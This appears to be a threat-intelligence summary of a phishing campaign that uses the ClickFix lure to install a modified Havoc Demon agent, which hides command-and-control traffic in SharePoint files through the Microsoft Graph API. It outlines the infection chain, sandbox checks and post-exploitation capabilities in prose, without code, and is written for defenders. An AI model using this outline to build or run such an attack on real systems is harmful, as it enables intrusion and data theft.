Introduction
A sophisticated cyberattack campaign has been identified, targeting Microsoft Windows users through social engineering [3] [5], multi-stage malware [1] [3] [5], and manipulation of trusted cloud services [3]. This campaign leverages a modified version of the Havoc command-and-control (C2) framework, known as the Havoc Demon Agent [3] [5], to gain control over compromised systems by embedding malicious communications within legitimate cloud traffic.
Description
A new cyberattack campaign targeting Microsoft Windows users has been identified, utilizing social engineering [3] [5] [7], multi-stage malware [1] [3] [5], and manipulation of trusted cloud services to gain control over compromised systems [5]. This campaign employs a modified version of the open-source Havoc command-and-control (C2) framework, known as the Havoc Demon Agent [3] [5], which conceals malicious communications within legitimate cloud traffic by leveraging the Microsoft Graph API and SharePoint functions. The threat actor utilizes a phishing technique, specifically the ClickFix method, to deceive users into executing a harmful PowerShell command [3] [4] [5] [7], embedding each stage of the malware within SharePoint environments to obscure C2 communications.
The attack begins with a phishing email containing an HTML attachment designed to trick recipients into executing a PowerShell command that leads them to a fake error page. This command initiates a series of events [3] [5], downloading a remote PowerShell script from a SharePoint-hosted URL that checks for sandbox environments [7]. If the script determines that the system is not sandboxed, it alters system registry entries to create infection markers and loads a Python interpreter to run a script that functions as a KaynLdr malware loader. The initial PowerShell script subsequently downloads a Python script that acts as a shellcode loader [3] [5], injecting and executing a malicious DLL called KaynLdr [3] [5], which is designed to evade sandbox detection [5].
The modified Havoc Demon DLL initiates with a function called DemonInit [1], utilizing a hash algorithm similar to KaynLdr for API retrieval and configuration initialization [1]. A key function, “SharePointC2Init,” accesses tokens for the Microsoft Graph API and creates files in the victim’s SharePoint document library for encrypted data transmission and command reception. The initial communication to the C2 server includes a CheckIn request that transmits victim information—such as Host Name [1], User Name [1] [6], Domain Name [1], IP Address [1] [2], OS Information [1], and account elevation status—encrypted with AES-256 in CTR mode [1]. By embedding command and control logic within Microsoft Graph API interactions [2], attackers leverage the trust associated with SharePoint and Office 365 services [2], complicating detection efforts [2]. Using these tokens [1], the agent can transmit victim information and receive C2 commands, allowing for a range of post-exploitation capabilities [5], including information gathering [1] [3] [5], file operations [1] [3] [5], command execution [1] [2] [3] [5] [7], token manipulation [1] [2] [3], and Kerberos attacks [1] [2].
If a Python interpreter is absent [7], the script installs one before executing the concealed shellcode loader [7], which includes debug messages in Russian and is designed to execute shellcode in memory [7], enabling attackers to maintain persistence [7]. The TransportSend function has been modified to facilitate C2 communication by accessing specific files associated with the victim [1]. It updates the request to one file and retrieves responses from another using the Microsoft Graph API [1], with responses erased immediately to reduce forensic traces [2]. If the response matches the AgentID [1], the session is marked as connected [1], and the agent enters a dispatcher routine to await further commands [1]. While only the DEMONCOMMANDNO_JOB (Command ID: 0xA) was observed [1], the framework supports over 50 commands [1], including file exfiltration [2], lateral movement [2], and Kerberos ticket manipulation [2], reflecting capabilities found in Havoc’s public repository [2].
Conclusion
To mitigate risks [1], users should exercise caution with phishing emails and guided messages that prompt terminal or PowerShell usage [1], as these can lead to the execution of malicious commands [1] [5]. Organizations are advised to bolster their security measures by blocking automatic PowerShell script execution and thoroughly verifying the origins of email attachments [6]. The integration of the modified Havoc Demon with the Microsoft Graph API complicates the detection and identification of malicious activities within public services [1], highlighting the evolution of open-source C2 frameworks and the increasing complexity and sophistication of cyber threats. The campaign demonstrates a high level of sophistication [5], requiring more manual action from victims than typical campaigns [5], which usually aim for minimal interaction [5].
References
[1] https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2
[2] https://cybersecuritynews.com/clickfix-tactic-to-attack-windows-machine/
[3] https://ciso2ciso.com/new-malware-campaign-exploits-microsoft-graph-api-to-infect-windows-sourcehackread-com/
[4] https://thenimblenerd.com/article/phishing-frenzy-havoc-demon-uses-microsoft-graph-to-hijack-sharepoint-how-to-stay-safe/
[5] https://hackread.com/malware-exploits-microsoft-graph-api-infect-windows/
[6] https://hackyourmom.com/en/novyny/hakery-vykorystovuyut-tehniku-clickfix-dlya-rozpovsyudzhennya-havoc-c2-cherez-sajty-sharepoint/
[7] https://www.infosecurity-magazine.com/news/phishing-campaign-havoc-framework/
